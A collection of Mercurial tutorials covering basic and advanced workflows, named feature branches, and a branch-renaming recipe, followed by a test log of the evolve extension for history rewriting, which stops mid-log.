To make this workflow more scalable, each one of you can have his own BitBucket repository and you can simply pull from the others' repositories. That way you can easily establish workflows in which certain people act as integrators and finally push checked code to a shared pull repository from which all others pull.

Note:

You can also use this workflow with a shared server instead of BitBucket, either via SSH or via a shared directory. An example of an SSH URL with Mercurial is ssh://user@example.com/path/to/repo. When using a shared directory you just push as if the repository in the shared directory were on your local drive.

Summary

Now let's take a step back and look where we are.

With the commands you already know, a bit of reading hg help <command> and some evil script-fu, you can already do almost everything you'll ever need to do when working with source code history. So from now on almost everything is convenience, and that's a good thing.

First this is good, because it means that you can now use most of the concepts which are utilized in more complex workflows.

Second it aids you, because convenience lets you focus on your task instead of focusing on your tool. It helps you concentrate on the coding itself. Still you can always go back to the basics, if you want to.

A short summary of what you can do, which can also act as a short check whether you still remember the meaning of the commands.

create a project

$ hg init project
$ cd project
$ (add some files)
$ hg add
$ hg commit
(enter the commit message)

do nonlinear development

$ (do some changes)
$ hg commit
(enter the commit message)
$ hg update 0
$ (do some changes)
$ hg commit
(enter the commit message)
$ hg merge
$ (optionally hg resolve)
$ hg commit
(enter the commit message)

use feature clones

$ cd ..
$ hg clone project feature1
$ cd feature1
$ (do some changes)
$ hg commit
(enter the commit message)
$ cd ../project
$ hg pull ../feature1

share your repository via the integrated webserver

$ hg serve &
$ cd ..
$ hg clone http://127.0.0.1:8000 project-clone

export changes to files

$ cd project-clone
$ (do some changes)
$ hg commit
(enter the commit message)
$ hg export tip > ../changes.diff

import changes from files

$ cd ../project
$ hg import ../changes.diff

pull changes from a served repository (hg serve still runs on project)

$ cd ../feature1
$ hg pull http://127.0.0.1:8000

Use shared repositories on BitBucket

$ (setup bitbucket repo)
$ hg push https://bitbucket.org/USER/REPO
(enter name and password in the prompt)
$ hg pull https://bitbucket.org/USER/REPO

Let's move on towards useful features and a bit more advanced workflows.

Advanced workflows

Backing out bad revisions

Use Case

When you routinely pull code from others, it can happen that you overlook some bad change. As soon as others pull that change from you, you have little chance to get completely rid of it.

To resolve that problem, Mercurial offers you the backout command. Backing out a change means that you tell Mercurial to create a commit which reverses the bad change. That way you don't get rid of the bad code in history, but you can remove it from new revisions.

Note:

The basic commands don't directly rewrite history. If you want to do that, you need to activate some of the extensions which are shipped with mercurial. We'll come to that later on.

Workflow

Let's assume the bad change was revision 3, and you already have one more revision in your
repository. To remove the bad code, you can just backout of it. This creates a new
change which reverses the bad change. After backing out, you can then merge that new change
into the current code.

$ hg backout 3
$ hg merge
(potentially resolve conflicts)
$ hg commit
(enter commit message. For example: "merged backout")

That's it. You reversed the bad change. It's still recorded that it was once there (following the principle "don't rewrite history, if it's not really necessary"), but it doesn't affect future code anymore.

Collaborative feature development

Now that you can share changes and reverse them if necessary, you can go one step further: Using Mercurial to help in coordinating the coding.

The first part is an easy way to develop features together, without requiring every developer to keep track of several feature clones.

Use Case

When you want to split your development into several features, you need to keep track of who works on which feature and where to get which changes.

Mercurial makes this easy for you by providing named branches. They are a part of the main repository, so they are available to everyone involved. At the same time, changes committed on a certain branch don't get mixed with the changes in the default branch, so features are kept separate, until they get merged into the default branch.

Note:

Cloning a repository always puts you onto the default branch at first.

Workflow

When someone in your group wants to start coding on a feature without disturbing the others, he can create a named branch and commit there. When someone else wants to join in, he just updates to the branch and commits away. As soon as the feature is finished, someone merges the named branch into the default branch.

Working in a named branch

Create the branch

$ hg branch feature1
(do some changes)
$ hg commit
(write commit message)

Update into the branch and work in it

$ hg update feature1
(do some changes)
$ hg commit
(write commit message)

Now you can commit, pull, push and merge (and anything else) as if you were working in a separate repository. If the history of the named branch is linear and you call "hg merge", Mercurial asks you to specify an explicit revision, since the branch in which you work doesn't have anything to merge.

Merge the named branch

When you finished the feature, you merge the branch back into the default branch.

$ hg update default
$ hg merge feature1
$ hg commit
(write commit message)

And that's it. Now you can easily keep features separate without unnecessary bookkeeping.

Note:

Named branches stay in the history as a permanent record after you have finished your work. If you don't like having that record in your history, please have a look at some of the advanced workflows.

Tagging revisions

Use Case

Since you can now code separate features more easily, you might want to mark certain revisions as fit for consumption (or similar). For example you might want to mark releases, or just mark off revisions as reviewed.

For this Mercurial offers tags. Tags add a name to a revision and are part of the history. You can tag a change years after it was committed. The tag includes the information when it was added, and tags can be pulled, pushed and merged just like any other committed change.

Note:

A tag must not contain the char ":", since that char is used for specifying multiple revisions - see "hg help revisions".

Note:

To securely mark a revision, you can use the gpg extension to sign the tag.
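For example - a minimal sketch, assuming you enabled the gpg extension in your ~/.hgrc and that YOUR-KEY-ID stands for one of your GnuPG key IDs - signing revision 3 (the revision we tag below) adds a signature to the file .hgsigs and commits it:

$ hg sign -k YOUR-KEY-ID 3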

Workflow

Let's assume you want to give revision 3 the name "v0.1".

Add the tag

$ hg tag -r 3 v0.1

See all tags

$ hg tags

When you look at the log, you'll now see a line in changeset 3 which marks the tag. If someone wants to update to the tagged revision, he can just use the name of your tag

$ hg update v0.1

Now he'll be at the tagged revision and can work from there.

Removing history

Use Case

At times you will have changes in your repository which you really don't want in it.

There are many advanced options for removing such changes, and most of them rely on extensions (Mercurial Queues is the one used most often), but in this basic guide we'll solve the problem with just the commands we already learned, plus one option to clone which we haven't used yet.

This workflow becomes inconvenient when you need to remove changes which are buried below many new changes. If you spot the bad changes early enough, you can get rid of them without too much effort, though.
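Just for comparison, a minimal sketch of the extension-based route, assuming you enabled the mq extension (which provides the strip command): stripping removes the given revision together with all its descendants, so you would still have to export and re-import revision 3 as shown in the workflow below.

$ hg strip 2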

Workflow

Let's assume you want to get rid of revision 2 and the highest revision is 3.

The first step is to use the "--rev" option to clone: Create a clone which only contains the changes up to the specified revision. Since you want to keep revision 1, you only clone up to that

$ hg clone -r 1 project stripped

Now you can export the change 3 from the original repository (project) and import it into the stripped one

$ cd project
$ hg export 3 > ../changes.diff
$ cd ../stripped
$ hg import ../changes.diff

If a part of the changes couldn't be applied, you'll see that part in *.rej files. If you have *.rej files, you'll have to include or discard changes by hand

$ cat *.rej
(apply changes by hand)
$ hg commit
(write commit message)

That's it. hg export also includes the commit message, date, committer and similar metadata, so you are already done.

Note:

Removing history will change the revision IDs of revisions after the removed one, and if you pull from someone else who still has the revision you removed, you will pull the removed parts again. That's why rewriting history should usually only be done for changes which you haven't yet published.

Summary

So now you can work with Mercurial in private, and also share your changes in a multitude of ways.

Additionally you can remove bad changes, either by creating a change in the repository which reverses the original change, or by really rewriting history, so it looks like the change never occurred.

And you can separate the work on features in a single repository by using named branches and add tags to revisions which are visible markers for others and can be used to update to the tagged revisions.

With this we can conclude our practical guide.

More Complex Workflows

If you now want to check some more complex workflows, please have a look at the general workflows wikipage.

To deepen your understanding, you should also check the basic concept overview.

Have fun with Mercurial!

License

Learning Mercurial in Workflows - A practical guide to version tracking / source code management with Mercurial
Copyright © 2011 Arne Babenhauserheide (main author), David Soria Parra, Augie Fackler, Benoit Boissinot, Adrian Buehlmann, Nicolas Dumazet and Steve Losh.

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

Mercurial Workflow: Feature separation via named branches

Also published on the Mercurial Workflows wikipage. Originally written for PyHurd: Python bindings for the GNU Hurd.

For Whom?

If you

  1. want to develop features collaboratively and you want to be able to see later for which feature a given change was added or
  2. want to do changes concurrently which would likely affect each other negatively while they are not finished, but which need to be developed in a group with minimal overhead,

then this workflow might be right for you.

Note: If you have a huge number of small features (2000 and upwards), the number of persistent named branches can create some performance problems for listing the branches (only for the listing! Pushing, as a different example, is unaffected: linear history is just as fast as 2000 branches). For features which need no collaboration or only a few commits, this workflow also has a lot of unnecessary overhead. It is best used for features which will be developed side by side with default for some time (and many commits), so that tracking the default branch against the feature is relevant. To mark single-commit features as belonging to a feature, just use the commit message.

Note: The difference between Mercurial named branches and git branches is that git branches don’t stay in history. They don’t allow you to find out later in which branch a certain commit was added. If you want git-style branching, just use bookmarks.
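A rough sketch of that alternative (feature-x is just a placeholder name):

hg bookmark feature-x
# commit as usual; the active bookmark moves along with your commits
hg push -B feature-x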

Note: If you avoid using stable as branch name, you can always upgrade this workflow to the complete branching model later on.

What you need

Just vanilla Mercurial.

Workflow

The workflow has six steps:

  1. create the new feature,
  2. implement and share,
  3. merge other changes into it,
  4. merge stable features,
  5. close finished features and
  6. reopen features.

Let’s see the steps in detail.

1. New feature

First start a new branch with the name of the feature (starting from default).

hg branch feature-x
# do some changes
hg commit -m "Started implementing feature-x"

2. Implement and share

Then commit away and push whenever you finish something which might be of interest to others, regardless of how marginal.

You can push to a shared repository or to your own clone, or even send the changes via email to other contributors (for example via the patchbomb extension).
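A rough sketch of those options (the URL and the address are placeholders; hg email is provided by the patchbomb extension):

hg push ssh://user@example.com/path/to/shared-repo
hg email --to someone@example.com -r "branch(feature-x)"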

3. Merge in default

Merge changes in the default branch into your feature as often as possible to reduce the work necessary when you want to merge the feature later on.

hg update feature-x
hg merge default
hg commit -m "merged default into feature-x"

4. Merge stable features

When your feature is stable, merge it into default.

hg update default
hg merge feature-x
hg commit -m "merged feature-x"

5. Close the branch when it’s done

And when the feature needs no more work, close the branch.

# start from default, automatic when using a fresh clone
hg update default
hg branch feature-x
# do some changes
hg commit -m "started feature X"
hg push
# commit and push as you like
hg update default
hg merge feature-x
hg ci -m "merged feature X into default"
# close the feature branch itself (--close-branch closes the branch you are currently on)
hg update feature-x
hg commit --close-branch -m "finished feature X"
hg update default

This hides the branch from the output of hg branches, so you don’t clutter your history.

6. Reopen the feature

To improve a feature after it was officially closed, first merge default into the feature branch (to get it up to date), then work just as if you had started it.

hg up feature-x
hg merge default
hg ci -m "merged default into feature X"
# commit, push, repeat, finish

Generally merge default into your feature as often as possible.

Epilog

If this workflow helps you, I’d be glad to hear from you!

For a more extensive project-workflow, have a look at the Complete Mercurial Branching Strategy. It extends the feature branches workflow to account for release cycles.

Mercurial for two Programmers who are (mostly) new to SCM

Written in the Mercurial mailing list

Hi Bernard,

On Tuesday, 03 February 2009, 20:19:14, ... ... wrote:
> Most of the docs I can find seem to assume the reader is familiar with
> existing software development tools and methodologies.
>
> This is not the case for me.

It wasn't for me either, and I can assure you that using Mercurial becomes
natural quite quickly.

> Now, I need to coordinate with a second (also SCM clueless) programmer.
...
> I envision us both working the main trunk for many small day-to-day
> changes, and our own isolated repo for larger additions that we will each
> be working on.

I don't know about a HOWTO, but I can give you a short description about basic
usage and the workflow I'd use:

Basic usage

  • Just commit as you'd have done in SVN via "hg commit".
  • To get changes from others, do "hg pull -u".
    The "-u" says 'update my files'. Always commit before you pull. Otherwise "hg pull -u" will try to merge the new changes.
  • If you already committed and then pull changes from someone else, you merge
    the changes with yours via "hg merge". Merging is quite painless in Mercurial, so you can easily do it often.
  • Once you want to share your changes, do "hg push".
    Should that complain about "adding heads", pull and merge, then do the push again. If you really want to create new remote heads, you can use "hg push -f". (A combined example session follows this list.)
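Put together, a typical session could look like this (just a sketch; the commit messages are only placeholders):

hg commit -m "fix the date parser"
hg pull -u
# only needed if the pull brought in a new head:
hg merge
hg commit -m "merge"
hg push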

Workflow

  • First off: Create a main repository you both can push changes to. If you have ssh access to a shared machine, that's as simple as creating a repository on that machine via "hg init project".
  • Now both of you clone from that repository via
    hg clone ssh://USER@ADDRESS/path/to/project project

    (ADDRESS can be either a host or an IP).

    That's your repository for the small day-to-day changes.

  • If you want to do bigger changes, you create a feature clone via
    hg clone project feature1

    In that clone you simply work, pull and commit as usual, but you only push after you have finished the feature.

    Once you have finished the feature, you push the changes from the feature clone via "hg push" in feature1 (which gets them into your main working clone) and then push them onward into the shared repository.

That's it - or rather that's what I'd do. It might be right for you, too, and
if it isn't, don't be shy of experimenting. As long as you have a backup clone
lying around (for example cloned to a USB stick via "hg clone project
path/to/stick/project"), you can't do too much damage :)

I hope I could provide a bit of help :)

Renaming a Mercurial branch with the evolve extension

Short version (rename from $OLD to $NEW):

ROOT="$(hg id -qr 'first(roots(branch('$OLD')))')"
MSG="$(hg log -r $ROOT -T '{desc}')"  

hg update $ROOT
hg branch $NEW
hg commit --amend -m "$MSG"
hg evolve --all

Mercurial records in which named branch a commit was created. This can be inconvenient when you choose temporary branch names like "foo" or "justworkdamnit".

The evolve extension enables safe, collaborative history editing which removes this inconvenience while preserving the reliability guarantees of Mercurial.

Here I show in a quick example how to rename a branch in Mercurial using the evolve extension.

You can use this method for all changes which you did not transfer elsewhere yet (they must be in draft or secret phase).
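To check that beforehand - a small sketch, reusing $OLD from the short version above - you can list the phases of all changes on the branch; every revision shown should be draft or secret:

hg phase -r "branch($OLD)"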

Note (2016): The evolve extension is still in testing. Do not use it for production yet. If you want to help stabilizing it, please join evolve-testers. I’ve been using it for more than a year, but I know how to fix things when I hit a bug in the evolve extension.

Setup evolve

hg clone https://www.mercurial-scm.org/repo/evolve/ ~/.local/share/hgext-evolve
echo "[extensions]
evolve = ~/.local/share/hgext-evolve/hgext/evolve.py" >> ~/.hgrc

Rename a branch

create repo with wrong branch name

hg init foo
cd foo
echo 1 > 1
hg ci -Am 1
echo stable > 1
hg branch stapling
hg ci -m stable
# add a second commit to the branch
# to make this non-trivial
echo stable2 > 1
hg ci -m stable2

change the branch name

# amend the first revision in the branch
hg up -r "first(branch(stapling))"
hg branch stable
hg ci --amend -m stable
# (notes that there is an unstable changeset)
# evolve the history
hg evolve

and check that it’s correct

hg log -G

That’s it.

Result

@  changeset:   5:1822f3b02b72
|  branch:      stable
|  tag:         tip
|  user:        Freenet
|  date:        Fri Nov 18 00:56:57 2016 +0100
|  summary:     stable2
|
o  changeset:   4:d47764612e1a
|  branch:      stable
|  parent:      0:d2b5bb69b11b
|  user:        Freenet
|  date:        Fri Nov 18 00:56:56 2016 +0100
|  summary:     stable
|
o  changeset:   0:d2b5bb69b11b
   user:        Freenet
   date:        Fri Nov 18 00:56:55 2016 +0100
   summary:     1

☺ Yay! ☺

Happy Hacking!

PS: For efficient collaboration via Mercurial see the complete branching strategy.

Test of the hg evolve extension for easier upstreaming

1 Rationale

PDF-version (for printing)

orgmode-version (for editing)

repository (for forking)

Currently I rework my code extensively before I push it into upstream SVN. Some of that is inconvenient and it would be nicer to have easy to use refactoring tools.

hg evolve might offer that.

This test uses the mutable-hg extension in revision c70a1091e0d8 (24 changesets after 2.1.0). It will likely be obsolete soon, since mutable-hg is currently being moved into Mercurial core by Pierre-Yves David, its main developer. I hope it will be useful for you to assess the future possibilities of Mercurial today. ("Obsolete" is not (only) a pun: obsolete markers are the functionality at the core of evolve which allows safe, collaborative history rewriting ☺)

2 Tests

# Tests for refactoring history with the evolve extension
export LANG=C # to get rid of localized strings
export PS1="$ "
rm -r testmy testother testpublic

2.1 Init

Initialize the repos I need for the test.

We have one public repo and 2 nonpublishing repos.

# Initialize the test repo
hg init testpublic # a public repo
hg init testmy # my repo
hg init testother # other repo
# make the two private repos nonpublishing
for i in my other
  do echo "[ui]
username = $i
[phases]
publish = False" > test${i}/.hg/hgrc
done

note: it would be nice if we could just specify nonpublishing with the init command.

2.2 Prepare

Prepare the content of the repos.

cd testmy
echo "Hello World" > hello.txt
hg ci -Am "Hello World"
hg log -G
cd ..

adding hello.txt
@  changeset:   0:c19ed5b17f4f
   tag:         tip
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World

2.3 Amend

Add a bad change and amend it.

cd testmy
sed -i s/World/Evoluton/ hello.txt
hg ci -m "Hello Evolution"
echo
hg log -G
cat hello.txt
# FIX this up
sed -i s/Evoluton/Evolution/ hello.txt
hg amend -m "Hello Evolution" # pass the message explicitly again to avoid having the editor pop up
echo
hg log -G
cd ..

@  changeset:   1:83a5e89adea6
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:41 2013 +0100
|  summary:     Hello Evolution
|
o  changeset:   0:c19ed5b17f4f
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World
Hello Evoluton

@  changeset:   3:129d59901401
|  tag:         tip
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|
o  changeset:   0:c19ed5b17f4f
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World

2.4 …together

Add a bad change, followed by a good change. Pull both into another repo. Do a good change in the other repo. Then amend the bad change in the original repo, pull the amended change into the other repo and evolve.

2.4.1 Setup

Now we change the format to planning a roleplaying session, to have a more complex task. We want to present this as a coherent story on how to plan a story, so we want clean history.

First I do my own change.

cd testmy
# Now we add the bad change
echo "Wishes:
- The Solek wants Action
- The Judicator wants Action

" >> plan.txt
hg ci -Am "What the players want"
# show what we did
echo
hg log -G -r tip
# and the good change
echo "Places: 
- The village
- The researchers cave
" >> plan.txt
hg ci -m "The places"
echo
hg log -G -r 1:
cd ..
  adding plan.txt

@  changeset:   4:b170dda0a4a7
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
 
@  changeset:   5:2a37053027cc
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   4:b170dda0a4a7
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
o  changeset:   3:129d59901401
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

Now my file contains the wishes of the players as well as the places.

We pull the changes into the repo of another gamemaster with whom we plan this game.

hg -R testother pull -u testmy
hg -R testother log -G -r 1:
pulling from testmy
requesting all changes
adding changesets
adding manifests
adding file changes
added 4 changesets with 4 changes to 2 files
2 files updated, 0 files merged, 0 files removed, 0 files unresolved
@  changeset:   3:2a37053027cc
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   2:b170dda0a4a7
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

note: the revision numbers are different because the other repo only gets those obsolete revisions which are ancestors of non-obsolete revisions. That way evolve slowly cleans out obsolete revisions from the history without breaking repositories which already have them (but giving them a clear and easy path for evolution).

He then adds the important people:

cd testother
echo "People:
- The Lost
- The Specter
" >> plan.txt
hg ci -m "The people"
echo
hg log -G -r 1:
cd ..
 
@  changeset:   4:65cc97fc774a
|  tag:         tip
|  user:        other
|  date:        Sat Jan 12 00:17:48 2013 +0100
|  summary:     The people
|
o  changeset:   3:2a37053027cc
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   2:b170dda0a4a7
|  user:        my
|  date:        Sat Jan 12 00:17:44 2013 +0100
|  summary:     What the players want
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

2.4.2 Fix my side

And I realize too late that my estimate of the wishes of the players was wrong. So I simply amend it.

cd testmy
hg up -r -2
sed -i "s/The Solek wants Action/The Solek wants emotionally intense situations/" plan.txt
hg amend -m "The wishes of the players"
hg log -G -r 1:
cd ..
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
1 new unstable changesets
@  changeset:   7:86e7a5305c9e
|  tag:         tip
|  parent:      3:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
| o  changeset:   5:2a37053027cc
| |  user:        my
| |  date:        Sat Jan 12 00:17:45 2013 +0100
| |  summary:     The places
| |
| x  changeset:   4:b170dda0a4a7
|/   user:        my
|    date:        Sat Jan 12 00:17:44 2013 +0100
|    summary:     What the players want
|
o  changeset:   3:129d59901401
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

Now I amended my commit, but my history does not look good yet. Actually it looks evil, since I have 2 heads, which is not so nice. The changeset from under which we just pulled away the bad change has become unstable: its ancestor has been obsoleted, so it no longer has a stable foothold. In other DVCSs, this means that we as users have to find out what was changed and fix it ourselves.

Changeset evolution allows us to evolve our repository to get rid of dependencies on obsolete changes.

cd testmy
hg evolve
hg log -G -r 1:
cd ..
move:[5] The places
atop:[7] The wishes of the players
merging plan.txt
@  changeset:   8:0980732d20e0
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   7:86e7a5305c9e
|  parent:      3:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
o  changeset:   3:129d59901401
|  parent:      0:c19ed5b17f4f
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

Now I have nice looking history without any hassle - and without having to resort to low-level commands.

2.4.3 Be a nice neighbor

But I rewrote history. What happens if my colleague pulls this?

hg -R testother pull testmy
hg -R testother log -G
pulling from testmy
searching for changes
adding changesets
adding manifests
adding file changes
added 2 changesets with 2 changes to 1 files (+1 heads)
(run 'hg heads' to see heads, 'hg merge' to merge)
1 new unstable changesets
o  changeset:   6:0980732d20e0
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   5:86e7a5305c9e
|  parent:      1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
| @  changeset:   4:65cc97fc774a
| |  user:        other
| |  date:        Sat Jan 12 00:17:48 2013 +0100
| |  summary:     The people
| |
| x  changeset:   3:2a37053027cc
| |  user:        my
| |  date:        Sat Jan 12 00:17:45 2013 +0100
| |  summary:     The places
| |
| x  changeset:   2:b170dda0a4a7
|/   user:        my
|    date:        Sat Jan 12 00:17:44 2013 +0100
|    summary:     What the players want
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|
o  changeset:   0:c19ed5b17f4f
   user:        my
   date:        Sat Jan 12 00:17:40 2013 +0100
   summary:     Hello World

As you can see, he is told that his changes became unstable, since they depend on obsolete history. No need to panic: He can just evolve his repo to be state of the art again.

But the unstable change is the current working directory, so evolve does not change it. Instead it tells us that we might want to call it with `--any`. And as with most hints in hg, the hint is right.

hg -R testother evolve
nothing to evolve here
(1 troubled changesets, do you want --any ?)

note: that message might be a candidate for cleanup.

hg -R testother evolve --any
hg -R testother log -G -r 1:
move:[4] The people
atop:[6] The places
merging plan.txt
@  changeset:   7:058175606243
|  tag:         tip
|  user:        other
|  date:        Sat Jan 12 00:17:48 2013 +0100
|  summary:     The people
|
o  changeset:   6:0980732d20e0
|  user:        my
|  date:        Sat Jan 12 00:17:45 2013 +0100
|  summary:     The places
|
o  changeset:   5:86e7a5305c9e
|  parent:      1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:50 2013 +0100
|  summary:     The wishes of the players
|
o  changeset:   1:129d59901401
|  user:        my
|  date:        Sat Jan 12 00:17:42 2013 +0100
|  summary:     Hello Evolution
|

And as you can see, everything looks nice again.

2.5 …safely

Publishing the changes into a public repo makes them immutable.

Now imagine, that my co-gamemaster publishes his work. Mercurial will then store that his changes were published and warn us, if we try to change them.

cd testother
hg up > /dev/null
echo "current phase"
hg phase .
hg push ../testpublic
echo "phase after publishing"
hg phase .
cd ..
current phase
7: draft
pushing to ../testpublic
searching for changes
adding changesets
adding manifests
adding file changes
added 5 changesets with 5 changes to 2 files
phase after publishing
7: public

Now trying to amend history will fail (except if we first change the phase to draft with `hg phase --force --draft .`).

cd testother
hg amend -m "change published history"
# change to draft
hg phase -fd .
hg phase .
# now we could amend, but that would defeat the point of this section, so we go to public again.
hg phase -p .
cd ..

abort: can not rewrite immutable changeset 058175606243
7: draft

Once I pull from that repo, the revisions which are in there will also switch phase to public in my repo.

So by pushing the changes into a publishing repo, you can get the Mercurial of all contributors to track which revisions are safe to change - and which are not. An alternative is using `hg phase -p REV`.

2.6 Fold

Do multiple commits to create a patch, then fold them into one commit.

Now I go into a bit of a planning spree.

cd testmy
echo "Scenes:" >> plan.txt
hg ci -m "we need scenes"

echo "- Lost appears" >> plan.txt
hg ci -m "scene"
echo "- People vanish" >> plan.txt
hg ci -m "scene"
echo "- Portals during dreamtime" >> plan.txt
hg ci -m "scene"
echo
hg log -G -r 9:
cd ..

@  changeset:   12:fbcce7ad7369
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:06 2013 +0100
|  summary:     scene
|
o  changeset:   11:189c0362a80f
|  user:        my
|  date:        Sat Jan 12 00:18:05 2013 +0100
|  summary:     scene
|
o  changeset:   10:715a31ac9dee
|  user:        my
|  date:        Sat Jan 12 00:18:05 2013 +0100
|  summary:     scene
|
o  changeset:   9:dfa4c226150b
|  user:        my
|  date:        Sat Jan 12 00:18:05 2013 +0100
|  summary:     we need scenes
|

Yes, I tend to do that…

But we actually only need one change, so let's make it one by folding the last 4 changes into a single commit.

Since fold needs an interactive editor (it does not take -m, yet), we will leave that out. The commented commands allow you to fold the changesets.

cd testmy
# hg fold -r "-1:-4"
# hg log -G -r 9:
cd ..

2.7 Split

Do one big commit, then split it into two atomic commits.

Now I apply the scenes to wishes, places and people. Which is not useful: First I should apply them to the wishes and check if all wishes are fulfilled. But while writing I forgot that, and anxious to show my co-gamemaster, I just did one big commit.

cd testmy
sed -i "s/The Judicator wants Action/The Judicator wants Action - portals/" plan.txt
sed -i "s/The village/The village - lost, vanish, portals/" plan.txt
hg ci -m "Apply Scenes to people and places."
echo
hg log -G -r 12:
cd ..

@  changeset:   13:5c83a3540c37
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:10 2013 +0100
|  summary:     Apply Scenes to people and places.
|
o  changeset:   12:fbcce7ad7369
|  user:        my
|  date:        Sat Jan 12 00:18:06 2013 +0100
|  summary:     scene
|

Let’s fix that: uncommit it and commit it as separate changes. Normally I would just use `hg record` to interactively select changes to record. Since this is a non-interactive test, I manually undo and redo changes instead.

cd testmy
hg uncommit --all # to undo all changes, not just those for specified files
hg diff
sed -i "s/The village - lost, vanish, portals/The village/" plan.txt
hg amend -m "Apply scenes to wishes"
sed -i "s/The village/The village - lost, vanish, portals/" plan.txt
hg commit -m "Apply scenes to places"
echo
hg log -G -r 12:
cd ..
new changeset is empty
(use "hg kill ." to remove it)
diff --git a/plan.txt b/plan.txt
--- a/plan.txt
+++ b/plan.txt
@@ -1,10 +1,10 @@
 Wishes:
 - The Solek wants emotionally intense situations
-- The Judicator wants Action
+- The Judicator wants Action - portals
 
 
 Places: 
-- The village
+- The village - lost, vanish, portals
 - The researchers cave
 
 Scenes:

@  changeset:   17:f8cc86f681ac
|  tag:         tip
|  user:        my
|  date:        Sat Jan 12 00:18:13 2013 +0100
|  summary:     Apply scenes to places
|
o  changeset:   16:6c8918a352e2
|  parent:      12:fbcce7ad7369
|  user:        my
|  date:        Sat Jan 12 00:18:12 2013 +0100
|  summary:     Apply scenes to wishes
|
o  changeset:   12:fbcce7ad7369
|  user:        my
|  date:        Sat Jan 12 00:18:06 2013 +0100
|  summary:     scene
|

2.8 …as afterthought

Do one big commit, add an atomic commit. Then split the big commit.

Let’s get the changes from our co-gamemaster and apply people to wishes, places and scenes. Then add a scene we need to fulfill the wishes and clean the commits afterwards.

First get the changes:

cd testmy
hg pull ../testother
hg merge  --tool internal:merge tip # the new head from our co-gamemaster
# fix the conflicts 
sed -i "s/<<<.*local//" plan.txt
sed -i "s/====.*/\n/" plan.txt
sed -i "s/>>>.*other//" plan.txt
# mark them as solved.
hg resolve -m
hg commit -m "merge people"
echo
hg log -G -r 12:
cd ..
pulling from ../testother
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files (+1 heads)
(run 'hg heads .' to see heads, 'hg merge' to merge)
merging plan.txt
warning: conflicts during merge.
merging plan.txt incomplete! (edit conflicts, then use 'hg resolve --mark')
0 files updated, 0 files merged, 0 files removed, 1 files unresolved
use 'hg resolve' to retry unresolved file merges or 'hg update -C .' to abandon

@    changeset:   19:8bf8d55739fa
|\   tag:         tip
| |  parent:      17:f8cc86f681ac
| |  parent:      18:058175606243
| |  user:        my
| |  date:        Sat Jan 12 00:18:16 2013 +0100
| |  summary:     merge people
| |
| o  changeset:   18:058175606243
| |  parent:      8:0980732d20e0
| |  user:        other
| |  date:        Sat Jan 12 00:17:48 2013 +0100
| |  summary:     The people
| |
o |  changeset:   17:f8cc86f681ac
| |  user:        my
| |  date:        Sat Jan 12 00:18:13 2013 +0100
| |  summary:     Apply scenes to places
| |
o |  changeset:   16:6c8918a352e2
| |  parent:      12:fbcce7ad7369
| |  user:        my
| |  date:        Sat Jan 12 00:18:12 2013 +0100
| |  summary:     Apply scenes to wishes
| |
o |  changeset:   12:fbcce7ad7369
| |  user:        my
| |  date:        Sat Jan 12 00:18:06 2013 +0100
| |  summary:     scene
| |

Now we have all changes in our repo. We begin to apply people to wishes, places and scenes.

cd testmy
sed -i "s/The Solek wants emotionally intense situations/The Solek wants emotionally intense situations | specter, Lost/" plan.txt
sed -i "s/Lost appears/Lost appears | Lost/" plan.txt
sed -i "s/People vanish/People vanish | Specter/" plan.txt
hg commit -m "apply people to wishes, places and scenes"
echo
hg log -G -r 19:
cat plan.txt
cd ..

@  changeset:   20:c00aa6f24c3f
|  tag:         tip
|  user:        my
